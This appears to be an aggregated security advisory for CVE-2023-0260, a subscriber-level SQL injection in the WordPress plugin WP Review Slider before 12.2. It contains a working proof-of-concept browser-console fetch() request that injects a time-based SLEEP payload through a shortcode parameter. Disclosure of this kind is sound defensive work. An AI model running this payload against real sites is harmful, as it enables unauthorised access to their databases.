Lucene search
Lana CodesWPVDB-ID:9165D46B-2A27-4E83-A096-73FFE9057C80HistoryJan 23, 2023 - 12:00 a.m.
WP Review Slider < 12.2 - Subscriber+ SQLi
2023-01-2300:00:00
Lana Codes
wpscan.com
7
wordpress
review slider
sql injection
security vulnerability
subscriber role
EPSS
0.001
Percentile
38.3%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.
PoC
Run the following code in the browser console on any WP Admin page. fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=parse-media-shortcode&shortcode;=[wprevpro_usetemplate tid=“1 AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)”]’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
Related
cvelist
cvelist
CVE-2023-0260 WP Review Slider < 12.2 - Subscriber+ SQLi
2023-02-13 14:32:12
cve
cve
CVE-2023-0260
2023-02-13 15:15:21
prion
prion
Sql injection
2023-02-13 15:15:00
nvd
nvd
CVE-2023-0260
2023-02-13 15:15:21
wpexploit
wpexploit
WP Review Slider < 12.2 - Subscriber+ SQLi
2023-01-23 00:00:00